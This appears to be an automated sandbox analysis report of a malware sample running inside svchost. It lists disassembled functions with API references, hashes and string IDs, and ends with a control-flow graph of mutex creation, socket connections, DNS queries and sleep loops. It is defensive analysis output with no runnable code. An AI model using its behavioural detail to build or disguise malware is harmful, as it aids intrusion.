                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2716363198-0
                                                                                                                                                                                                                                                          • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                          • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2459447590-0
                                                                                                                                                                                                                                                          • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                          • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3817610042-0
                                                                                                                                                                                                                                                          • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                          • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04026C8A
                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 04027019
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                          • String ID: ir\
                                                                                                                                                                                                                                                          • API String ID: 3817610042-1854106103
                                                                                                                                                                                                                                                          • Opcode ID: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                          • Instruction ID: 71bce72721c98fd701a8830471f0d2f2c7e2f459ebc33f17165b16ca64a09b40
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD118B0D00228DBDF54DFE8DA94BEDBBB1BF48308F108569E405BB280E735A945DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memsetcodecvt
                                                                                                                                                                                                                                                          • String ID: wwww
                                                                                                                                                                                                                                                          • API String ID: 2800761558-671953474
                                                                                                                                                                                                                                                          • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                          • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: cE
                                                                                                                                                                                                                                                          • API String ID: 2102423945-163553156
                                                                                                                                                                                                                                                          • Opcode ID: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                          • Instruction ID: fdc2fad14a78642c3e0d9cddc9ad9ddf1c8cf601b710c5b7852a6cc2ffa68677
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40718170E04238EAEF60CF91DA547BDB7F5AB01305F14819AE4897E1C4D7746A84DF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $2$l
                                                                                                                                                                                                                                                          • API String ID: 0-3132104027
                                                                                                                                                                                                                                                          • Opcode ID: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                          • Instruction ID: 97a9dc216c0970bdd76ba4c43342de9e9df9d78a676d099925bbab2bb04a16ba
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD41DD30A862688AFF74CE64889C3F87BF5AB11359F4481CAC0A97A1C1C7757B86CF01
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                          • String ID: `pB
                                                                                                                                                                                                                                                          • API String ID: 3713721629-8080248
                                                                                                                                                                                                                                                          • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                          • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: wwww
                                                                                                                                                                                                                                                          • API String ID: 2102423945-671953474
                                                                                                                                                                                                                                                          • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                          • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4218353326-0
                                                                                                                                                                                                                                                          • Opcode ID: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                          • Instruction ID: 6b2d4ef1dc70f01762c9ea93bfd451974196985589b21f9b2b8d381f5f98cc15
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7791D8B4E00219DFDF44DF98D580AEEBBB1BF48318F248169E505B7381E735AA41CB56
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                          • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                          • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4053968246-0
                                                                                                                                                                                                                                                          • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                          • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                          • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                          • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                                                                                            • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                                                                                            • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                                                                                          • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                          • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset_strlen
                                                                                                                                                                                                                                                          • String ID: duB
                                                                                                                                                                                                                                                          • API String ID: 2279092321-2047154145
                                                                                                                                                                                                                                                          • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                          • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: d$d
                                                                                                                                                                                                                                                          • API String ID: 2102423945-195624457
                                                                                                                                                                                                                                                          • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                          • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset_strlen
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2279092321-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                          • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 1314e012-1314e074 GetSystemTime call 1314ffd0 GetTickCount * 2 3 1314e076 0->3 4 1314e07d-1314e080 0->4 3->4 5 1314e082-1314e0ba call 13144ea1 * 2 call 13145b7d call 13144eb3 * 2 4->5 6 1314e0bd-1314e0c3 4->6 5->6 7 1314e18c-1314e19d call 1314dae3 6->7 8 1314e0c9-1314e0d0 6->8 18 1314e297-1314e2d1 shutdown closesocket call 13142f79 call 131506ce 7->18 19 1314e1a3-1314e1b7 OpenMutexA 7->19 11 1314e0e5-1314e0f7 socket 8->11 12 1314e0d2-1314e0e0 shutdown closesocket 8->12 15 1314e0fd-1314e132 call 13142f79 call 131506ce 11->15 16 1314e31e-1314e34b ExitProcess GetTickCount 11->16 12->11 41 1314e134 15->41 42 1314e13b-1314e15a htons connect 15->42 27 1314e352-1314e380 call 13144d0b htons 16->27 18->4 47 1314e2d7-1314e319 call 13144c1f call 13144ea1 * 2 call 1314df53 call 13144eb3 * 2 18->47 23 1314e1c7-1314e1e8 call 13144c1f GetTickCount call 1314df98 19->23 24 1314e1b9-1314e1c1 CreateMutexA 19->24 23->4 57 1314e1ee-1314e20a call 13142f79 call 131506ce 23->57 24->23 44 1314e383-1314e389 27->44 41->42 49 1314e15c-1314e167 call 1314d177 42->49 50 1314e169-1314e174 GetLastError Sleep 42->50 45 1314e3e9 44->45 46 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 44->46 56 1314e3eb-1314e3f1 45->56 65 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 46->65 66 1314e3e0-1314e3e7 46->66 47->4 52 1314e17a-1314e186 49->52 50->52 52->4 52->7 61 1314e462-1314e46f 56->61 62 1314e3f3-1314e3f9 56->62 86 1314e20c-1314e218 closesocket 57->86 87 1314e21d-1314e249 call 13142f79 call 131506ce GetTickCount 57->87 71 1314e471-1314e478 61->71 72 1314e48a-1314e4aa call 13142f79 call 131506ce 61->72 68 1314e457-1314e460 62->68 69 1314e3fb-1314e43f socket setsockopt connect 62->69 65->66 66->44 66->45 68->56 68->61 77 1314e451-1314e452 closesocket 69->77 78 1314e441-1314e44c recv 69->78 73 1314e479-1314e47b 71->73 72->27 94 1314e4b0-1314e4b6 72->94 80 1314e484-1314e488 73->80 81 1314e47d 73->81 77->68 78->77 80->72 80->73 81->80 86->87 87->4 102 1314e24f-1314e28a Sleep call 13142f79 call 131506ce GetTickCount 87->102 94->27 97 1314e4bc-1314e4ca Sleep 94->97 97->94 100 1314e4cc 97->100 100->27 109 1314e28c-1314e292 102->109 109->4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,00020000,76122E60,00000000), ref: 1314E01F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E03A
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E041
                                                                                                                                                                                                                                                          • shutdown.WS2_32(?,00000002), ref: 1314E0D5
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 1314E0E0
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0EA
